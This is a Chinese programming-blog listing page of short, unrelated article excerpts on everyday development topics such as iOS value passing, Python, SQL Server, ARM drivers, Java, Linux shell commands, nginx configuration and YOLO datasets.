    前言在完成暑假仿写项目时,遇到了许多需要用到多界面传值的地方,这篇博客来总结一下比较常用的五种多界面传值的方式。属性传值属性传值一般用前一个界面向后一个界面传值,简单地说就是通过访问后一个视图控制器的属性来为它赋值,通过这个属性来做到从前一个界面向后一个界面传值。首先在后一个界面中定义属性@interfaceBViewController:UIViewController@propertyNSSt
  • Cell Insight | 单细胞测序技术又一新发现,可用于HIV-1和Mtb共感染个体诊断 尐尐呅
    结核病是艾滋病合并其他疾病中导致患者死亡的主要原因。其中结核病由结核分枝杆菌(Mycobacteriumtuberculosis,Mtb)感染引起,获得性免疫缺陷综合症(艾滋病)由人免疫缺陷病毒(Humanimmunodeficiencyvirustype1,HIV-1)感染引起。国家感染性疾病临床医学研究中心/深圳市第三人民医院张国良团队携手深圳华大生命科学研究院吴靓团队,共同研究得出单细胞测序
  • swagger访问路径 igotyback swagger
    Swagger2.x版本访问地址:http://{ip}:{port}/{context-path}/swagger-ui.html{ip}是你的服务器IP地址。{port}是你的应用服务端口,通常为8080。{context-path}是你的应用上下文路径,如果应用部署在根路径下,则为空。Swagger3.x版本对于Swagger3.x版本(也称为OpenAPI3)访问地址:http://{ip
  • Linux下QT开发的动态库界面弹出操作(SDL2) 13jjyao QT类qt开发语言sdl2linux
    需求:操作系统为linux,开发框架为qt,做成需带界面的qt动态库,调用方为java等非qt程序难点:调用方为java等非qt程序,也就是说调用方肯定不带QApplication::exec(),缺少了这个,QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出);这与qt调用本身qt库是有本质的区别的思路:1.调用方缺QApplication::exec(),那么我们在接口
  • 每日一题——第八十四题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:编写函数1、输入10个职工的姓名和职工号2、按照职工由大到小顺序排列,姓名顺序也随之调整3、要求输入一个职工号,用折半查找法找出该职工的姓名#define_CRT_SECURE_NO_WARNINGS#include#include#defineMAX_EMPLOYEES10typedefstruct{intid;charname[50];}Empolyee;voidinputEmploye
  • WPF中的ComboBox控件几种数据绑定的方式 互联网打工人no1 wpfc#
    一、用字典给ItemsSource赋值(此绑定用的地方很多,建议熟练掌握)在XMAL中:在CS文件中privatevoidBindData(){DictionarydicItem=newDictionary();dicItem.add(1,"北京");dicItem.add(2,"上海");dicItem.add(3,"广州");cmb_list.ItemsSource=dicItem;cmb_l
  • python os.environ_python os.environ 读取和设置环境变量 weixin_39605414 pythonos.environ
    >>>importos>>>os.environ.keys()['LC_NUMERIC','GOPATH','GOROOT','GOBIN','LESSOPEN','SSH_CLIENT','LOGNAME','USER','HOME','LC_PAPER','PATH','DISPLAY','LANG','TERM','SHELL','J2REDIR','LC_MONETARY','QT_QPA
  • 将cmd中命令输出保存为txt文本文件 落难Coder Windowscmdwindow
    最近深度学习本地的训练中我们常常要在命令行中运行自己的代码,无可厚非,我们有必要保存我们的炼丹结果,但是复制命令行输出到txt是非常麻烦的,其实Windows下的命令行为我们提供了相应的操作。其基本的调用格式就是:运行指令>输出到的文件名称或者具体保存路径测试下,我打开cmd并且ping一下百度:pingwww.baidu.com>./data.txt看下相同目录下data.txt的输出:如果你再
  • 下载github patch到本地 小米人er 我的博客gitpatch
    以下是几种从GitHub上下载以.patch结尾的补丁文件的方法:通过浏览器直接下载打开包含该.patch文件的GitHub仓库。在仓库的文件列表中找到对应的.patch文件。点击该文件,浏览器会显示文件的内容,在页面的右上角通常会有一个“Raw”按钮,点击它可以获取原始文件内容。然后在浏览器中使用快捷键(如Ctrl+S或者Command+S)将原始文件保存到本地,选择保存的文件名并确保后缀为.p
  • 使用 FinalShell 进行远程连接(ssh 远程连接 Linux 服务器) 编程经验分享 开发工具服务器sshlinux
    目录前言基本使用教程新建远程连接连接主机自定义命令路由追踪前言后端开发,必然需要和服务器打交道,部署应用,排查问题,查看运行日志等等。一般服务器都是集中部署在机房中,也有一些直接是云服务器,总而言之,程序员不可能直接和服务器直接操作,一般都是通过ssh连接来登录服务器。刚接触远程连接时,使用的是XSHELL来远程连接服务器,连接上就能够操作远程服务器了,但是仅用XSHELL并没有上传下载文件的功能
  • SQL Server_查询某一数据库中的所有表的内容 qq_42772833 SQLServer数据库sqlserver
    1.查看所有表的表名要列出CrabFarmDB数据库中的所有表(名),可以使用以下SQL语句:USECrabFarmDB;--切换到目标数据库GOSELECTTABLE_NAMEFROMINFORMATION_SCHEMA.TABLESWHERETABLE_TYPE='BASETABLE';对这段SQL脚本的解释:SELECTTABLE_NAME:这个语句的作用是从查询结果中选择TABLE_NAM
  • 四章-32-点要素的聚合 彩云飘过
    本文基于腾讯课堂老胡的课《跟我学Openlayers--基础实例详解》做的学习笔记,使用的openlayers5.3.xapi。源码见1032.html,对应的官网示例https://openlayers.org/en/latest/examples/cluster.htmlhttps://openlayers.org/en/latest/examples/earthquake-clusters.
  • 探索OpenAI和LangChain的适配器集成:轻松切换模型提供商 nseejrukjhad langchaineasyui前端python
    #探索OpenAI和LangChain的适配器集成:轻松切换模型提供商##引言在人工智能和自然语言处理的世界中,OpenAI的模型提供了强大的能力。然而,随着技术的发展,许多人开始探索其他模型以满足特定需求。LangChain作为一个强大的工具,集成了多种模型提供商,通过提供适配器,简化了不同模型之间的转换。本篇文章将介绍如何使用LangChain的适配器与OpenAI集成,以便轻松切换模型提供商
  • python是什么意思中文-在python中%是什么意思 编程大乐趣
    Python中%有两种:1、数值运算:%代表取模,返回除法的余数。如:>>>7%212、%操作符(字符串格式化,stringformatting),说明如下:%[(name)][flags][width].[precision]typecode(name)为命名flags可以有+,-,''或0。+表示右对齐。-表示左对齐。''为一个空格,表示在正数的左侧填充一个空格,从而与负数对齐。0表示使用0填
  • 在一台Ubuntu计算机上构建Hyperledger Fabric网络 落叶无声9 区块链超级账本Hyperledgerfabric区块链ubuntu构建hyperledgerfabric
    在一台Ubuntu计算机上构建HyperledgerFabric网络Hyperledgerfabric是一个开源的区块链应用程序平台,为开发基于区块链的应用程序提供了一个起点。当我们提到HyperledgerFabric网络时,我们指的是使用HyperledgerFabric的正在运行的系统。即使只使用最少数量的组件,部署Fabric网络也不是一件容易的事。Fabric社区创建了一个名为Cello
  • python八股文面试题分享及解析(1) Shawn________ python
    #1.'''a=1b=2不用中间变量交换a和b'''#1.a=1b=2a,b=b,aprint(a)print(b)结果:21#2.ll=[]foriinrange(3):ll.append({'num':i})print(11)结果:#[{'num':0},{'num':1},{'num':2}]#3.kk=[]a={'num':0}foriinrange(3):#0,12#可变类型,不仅仅改变
  • log4j配置 yy爱yy
    #log4j.rootLogger配置的是大于等于当前级别的日志信息的输出#log4j.rootLogger用法:(注意appenderName可以是一个或多个)#log4j.rootLogger=日志级别,appenderName1,appenderName2,....#log4j.appender.appenderName2定义的是日志的输出方式,有两种:一种是命令行输出或者叫控制台输出,另一
  • 【目标检测数据集】卡车数据集1073张VOC+YOLO格式 熬夜写代码的平头哥∰ 目标检测YOLO人工智能
    数据集格式:PascalVOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件)图片数量(jpg文件个数):1073标注数量(xml文件个数):1073标注数量(txt文件个数):1073标注类别数:1标注类别名称:["truck"]每个类别标注的框数:truck框数=1120总框数:1120使用标注工具:labelImg标注
  • webpack图片等资源的处理 dmengmeng
    需要的loaderfile-loader(让我们可以引入这些资源文件)url-loader(其实是file-loader的二次封装)img-loader(处理图片所需要的)在没有使用任何处理图片的loader之前,比如说css中用到了背景图片,那么最后打包会报错的,因为他没办法处理图片。其实你只想能够使用图片的话。只加一个file-loader就可以,打开网页能准确看到图片。{test:/\.(p
  • 番茄西红柿叶子病害分类数据集12882张11类别 futureflsl 数据集分类数据挖掘人工智能
    数据集类型:图像分类用,不可用于目标检测无标注文件数据集格式:仅仅包含jpg图片,每个类别文件夹下面存放着对应图片图片数量(jpg文件个数):12882分类类别数:11类别名称:["Bacterial_Spot_Bacteria","Early_Blight_Fungus","Healthy","Late_Blight_Water_Mold","Leaf_Mold_Fungus","Powdery
  • 钢筋长度超限检测检数据集VOC+YOLO格式215张1类别 futureflsl 数据集YOLO深度学习机器学习
    数据集格式:PascalVOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件)图片数量(jpg文件个数):215标注数量(xml文件个数):215标注数量(txt文件个数):215标注类别数:1标注类别名称:["iron"]每个类别标注的框数:iron框数=215总框数:215使用标注工具:labelImg标注规则:对类别进
  • CX8836:小体积大功率升降压方案推荐(附Demo设计指南) 诚芯微科技 社交电子
    CX8836是一颗同步四开关单向升降压控制器,在4.5V-40V宽输入电压范围内稳定工作,持续负载电流10A,能够在输入高于或低于输出电压时稳定调节输出电压,可适用于USBPD快充、车载充电器、HUB、汽车启停系统、工业PC电源等多种升降压应用场合,为大功率TYPE-CPD车载充电器提供最优解决方案。提供CX8836Demo测试、CX8836样品申请及CX8836方案开发技术支持。CX8836同升
  • Python 实现图片裁剪(附代码) | Python工具 剑客阿良_ALiang
    前言本文提供将图片按照自定义尺寸进行裁剪的工具方法,一如既往的实用主义。环境依赖ffmpeg环境安装,可以参考我的另一篇文章:windowsffmpeg安装部署_阿良的博客-CSDN博客本文主要使用到的不是ffmpeg,而是ffprobe也在上面这篇文章中的zip包中。ffmpy安装:pipinstallffmpy-ihttps://pypi.douban.com/simple代码不废话了,上代码
  • 【华为OD技术面试真题 - 技术面】- python八股文真题题库(4) 算法大师 华为od面试python
    华为OD面试真题精选专栏:华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选**1.Python中的`with`**用途和功能自动资源管理示例:文件操作上下文管理协议示例代码工作流程解析优点2.\_\_new\_\_和**\_\_init\_\_**区别__new____init__区别总结3.**切片(Slicing)操作**基本切片语法
  • 第六集如何安装CentOS7.0,3分钟学会centos7安装教程 date分享
    从光盘引导系统按回车键继续进入引导程序安装界面,选择语言这里选择简体中文版点击继续选择桌面安装下面给系统分区选择磁盘,点击完成选择基本分区,点击加号swap分区,大小填内存的两倍在选择根分区,使用所有可用的磁盘空间选择文件系统ext4点击完成,点击开始安装设置root密码,点击完成设置普通用户和密码,点击完成整个过程持续八分钟左右根据个人配置不同,时间长短不同好,现在点击重启系统进入重启状态点击本
  • ARM驱动学习之基础小知识 JT灬新一 ARM嵌入式arm开发学习
    ARM驱动学习之基础小知识•sch原理图工程师工作内容–方案–元器件选型–采购(能不能买到,价格)–原理图(涉及到稳定性)•layout画板工程师–layout(封装、布局,布线,log)(涉及到稳定性)–焊接的一部分工作(调试阶段板子的焊接)•驱动工程师–驱动,原理图,layout三部分的交集容易发生矛盾•PCB研发流程介绍–方案,原理图(网表)–layout工程师(gerber文件)–PCB板
  • ARM驱动学习之5 LEDS驱动 JT灬新一 嵌入式C底层arm开发学习单片机
    ARM驱动学习之5LEDS驱动知识点:•linuxGPIO申请函数和赋值函数–gpio_request–gpio_set_value•三星平台配置GPIO函数–s3c_gpio_cfgpin•GPIO配置输出模式的宏变量–S3C_GPIO_OUTPUT注意点:DRIVER_NAME和DEVICE_NAME匹配。实现步骤:1.加入需要的头文件://Linux平台的gpio头文件#include//三
  • ARM驱动学习之4小结 JT灬新一 嵌入式C++arm开发学习linux
    ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
  • java线程Thread和Runnable区别和联系 zx_code javajvmthread多线程Runnable
    我们都晓得java实现线程2种方式,一个是继承Thread,另一个是实现Runnable。 模拟窗口买票,第一例子继承thread,代码如下 package thread; public class ThreadTest { public static void main(String[] args) { Thread1 t1 = new Thread1(
  • 【转】JSON与XML的区别比较 丁_新 jsonxml
    1.定义介绍 (1).XML定义 扩展标记语言 (Extensible Markup Language, XML) ,用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 XML使用DTD(document type definition)文档类型定义来组织数据;格式统一,跨平台和语言,早已成为业界公认的标准。 XML是标
  • c++ 实现五种基础的排序算法 CrazyMizzz C++c算法
    #include<iostream> using namespace std; //辅助函数,交换两数之值 template<class T> void mySwap(T &x, T &y){ T temp = x; x = y; y = temp; } const int size = 10; //一、用直接插入排
  • 我的软件 麦田的设计者 我的软件音乐类娱乐放松
         这是我写的一款app软件,耗时三个月,是一个根据央视节目开门大吉改变的,提供音调,猜歌曲名。1、手机拥有者在android手机市场下载本APP,同意权限,安装到手机上。2、游客初次进入时会有引导页面提醒用户注册。(同时软件自动播放背景音乐)。3、用户登录到主页后,会有五个模块。a、点击不胫而走,用户得到开门大吉首页部分新闻,点击进入有新闻详情。b、
  • linux awk命令详解 被触发 linux awk
    awk是行处理器: 相比较屏幕处理的优点,在处理庞大文件时不会出现内存溢出或是处理缓慢的问题,通常用来格式化文本信息 awk处理过程: 依次对每一行进行处理,然后输出 awk命令形式: awk [-F|-f|-v] ‘BEGIN{} //{command1; command2} END{}’ file [-F|-f|-v]大参数,-F指定分隔符,-f调用脚本,-v定义变量 var=val
  • 各种语言比较 _wy_ 编程语言
                        Java Ruby PHP 擅长领域                  
  • oracle 中数据类型为clob的编辑 知了ing oracle clob
    public void updateKpiStatus(String kpiStatus,String taskId){ Connection dbc=null; Statement stmt=null; PreparedStatement ps=null; try { dbc = new DBConn().getNewConnection(); //stmt = db
  • 分布式服务框架 Zookeeper -- 管理分布式环境中的数据 矮蛋蛋 zookeeper
    原文地址: http://www.ibm.com/developerworks/cn/opensource/os-cn-zookeeper/ 安装和配置详解 本文介绍的 Zookeeper 是以 3.2.2 这个稳定版本为基础,最新的版本可以通过官网 http://hadoop.apache.org/zookeeper/来获取,Zookeeper 的安装非常简单,下面将从单机模式和集群模式两
  • tomcat数据源 alafqq tomcat
    数据库 JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。 没有使用JNDI时我用要这样连接数据库: 03.  Class.forName("com.mysql.jdbc.Driver");  04.  conn
  • 遍历的方法 百合不是茶 遍历
                                                          遍历 在java的泛
  • linux查看硬件信息的命令 bijian1013 linux
    linux查看硬件信息的命令 一.查看CPU: cat /proc/cpuinfo   二.查看内存: free   三.查看硬盘: df   linux下查看硬件信息 1、lspci 列出所有PCI 设备; lspci - list all PCI devices:列出机器中的PCI设备(声卡、显卡、Modem、网卡、USB、主板集成设备也能
  • java常见的ClassNotFoundException bijian1013 java
    1.java.lang.ClassNotFoundException: org.apache.commons.logging.LogFactory   添加包common-logging.jar2.java.lang.ClassNotFoundException: javax.transaction.Synchronization    
  • 【Gson五】日期对象的序列化和反序列化 bit1129 反序列化
    对日期类型的数据进行序列化和反序列化时,需要考虑如下问题:   1. 序列化时,Date对象序列化的字符串日期格式如何 2. 反序列化时,把日期字符串序列化为Date对象,也需要考虑日期格式问题 3. Date A -> str -> Date B,A和B对象是否equals   默认序列化和反序列化     import com
  • 【Spark八十六】Spark Streaming之DStream vs. InputDStream bit1129 Stream
      1. DStream的类说明文档:   /** * A Discretized Stream (DStream), the basic abstraction in Spark Streaming, is a continuous * sequence of RDDs (of the same type) representing a continuous st
  • 通过nginx获取header信息 ronin47 nginx header
    1. 提取整个的Cookies内容到一个变量,然后可以在需要时引用,比如记录到日志里面, if ( $http_cookie ~* "(.*)$") {         set $all_cookie $1; }     变量$all_cookie就获得了cookie的值,可以用于运算了
  • java-65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 bylijinnan java
    参考了网上的http://blog.csdn.net/peasking_dd/article/details/6342984 写了个java版的: public class Print_1_To_NDigit { /** * Q65.输入数字n,按顺序输出从1最大的n位10进制数。比如输入3,则输出1、2、3一直到最大的3位数即999 * 1.使用字符串
  • Netty源码学习-ReplayingDecoder bylijinnan javanetty
    ReplayingDecoder是FrameDecoder的子类,不熟悉FrameDecoder的,可以先看看 http://bylijinnan.iteye.com/blog/1982618 API说,ReplayingDecoder简化了操作,比如: FrameDecoder在decode时,需要判断数据是否接收完全: public class IntegerH
  • js特殊字符过滤 cngolon js特殊字符js特殊字符过滤
    1.js中用正则表达式 过滤特殊字符, 校验所有输入域是否含有特殊符号function stripscript(s) {    var pattern = new RegExp("[`~!@#$^&*()=|{}':;',\\[\\].<>/?~!@#¥……&*()&mdash;—|{}【】‘;:”“'。,、?]"
  • hibernate使用sql查询 ctrain Hibernate
    import java.util.Iterator; import java.util.List; import java.util.Map; import org.hibernate.Hibernate; import org.hibernate.SQLQuery; import org.hibernate.Session; import org.hibernate.Transa
  • linux shell脚本中切换用户执行命令方法 daizj linuxshell命令切换用户
    经常在写shell脚本时,会碰到要以另外一个用户来执行相关命令,其方法简单记下:   1、执行单个命令:su - user -c "command" 如:下面命令是以test用户在/data目录下创建test123目录 [root@slave19 /data]# su - test -c "mkdir /data/test123" 
  • 好的代码里只要一个 return 语句 dcj3sjt126com return
    别再这样写了:public boolean foo() {    if (true) {         return true;     } else {          return false;    
  • Android动画效果学习 dcj3sjt126com android
    1、透明动画效果 方法一:代码实现 public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.fragment_main, container, fals
  • linux复习笔记之bash shell (4)管道命令 eksliang linux管道命令汇总linux管道命令linux常用管道命令
    转载请出自出处: http://eksliang.iteye.com/blog/2105461     bash命令执行的完毕以后,通常这个命令都会有返回结果,怎么对这个返回的结果做一些操作呢?那就得用管道命令‘|’。     上面那段话,简单说了下管道命令的作用,那什么事管道命令呢?     答:非常的经典的一句话,记住了,何为管
  • Android系统中自定义按键的短按、双击、长按事件 gqdy365 android
    在项目中碰到这样的问题: 由于系统中的按键在底层做了重新定义或者新增了按键,此时需要在APP层对按键事件(keyevent)做分解处理,模拟Android系统做法,把keyevent分解成: 1、单击事件:就是普通key的单击; 2、双击事件:500ms内同一按键单击两次; 3、长按事件:同一按键长按超过1000ms(系统中长按事件为500ms); 4、组合按键:两个以上按键同时按住;
  • asp.net获取站点根目录下子目录的名称 hvt .netC#asp.nethovertreeWeb Forms
    使用Visual Studio建立一个.aspx文件(Web Forms),例如hovertree.aspx,在页面上加入一个ListBox代码如下: <asp:ListBox runat="server" ID="lbKeleyiFolder" />   那么在页面上显示根目录子文件夹的代码如下: string[] m_sub
  • Eclipse程序员要掌握的常用快捷键 justjavac javaeclipse快捷键ide
      判断一个人的编程水平,就看他用键盘多,还是鼠标多。用键盘一是为了输入代码(当然了,也包括注释),再有就是熟练使用快捷键。   曾有人在豆瓣评 《卓有成效的程序员》:“人有多大懒,才有多大闲”。之前我整理了一个 程序员图书列表,目的也就是通过读书,让程序员变懒。  写道 程序员作为特殊的群体,有的人可以这么懒,懒到事情都交给机器去做,而有的人又可
  • c++编程随记 lx.asymmetric C++笔记
     为了字体更好看,改变了格式……   &&运算符:   #include<iostream> using namespace std; int main(){      int a=-1,b=4,k;      k=(++a<0)&&!(b--
  • linux标准IO缓冲机制研究 音频数据 linux
    一、什么是缓存I/O(Buffered I/O)缓存I/O又被称作标准I/O,大多数文件系统默认I/O操作都是缓存I/O。在Linux的缓存I/O机制中,操作系统会将I/O的数据缓存在文件系统的页缓存(page cache)中,也就是说,数据会先被拷贝到操作系统内核的缓冲区中,然后才会从操作系统内核的缓冲区拷贝到应用程序的地址空间。1.缓存I/O有以下优点:A.缓存I/O使用了操作系统内核缓冲区,
  • 随想 生活 暗黑小菠萝 生活
    其实账户之前就申请了,但是决定要自己更新一些东西看也是最近。从毕业到现在已经一年了。没有进步是假的,但是有多大的进步可能只有我自己知道。   毕业的时候班里12个女生,真正最后做到软件开发的只要两个包括我,PS:我不是说测试不好。当时因为考研完全放弃找工作,考研失败,我想这只是我的借口。那个时候才想到为什么大学的时候不能好好的学习技术,增强自己的实战能力,以至于后来找工作比较费劲。我
  • 我认为POJO是一个错误的概念 windshome javaPOJO编程J2EE设计
                  这篇内容其实没有经过太多的深思熟虑,只是个人一时的感觉。从个人风格上来讲,我倾向简单质朴的设计开发理念;从方法论上,我更加倾向自顶向下的设计;从做事情的目标上来看,我追求质量优先,更愿意使用较为保守和稳妥的理念和方法。    &
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他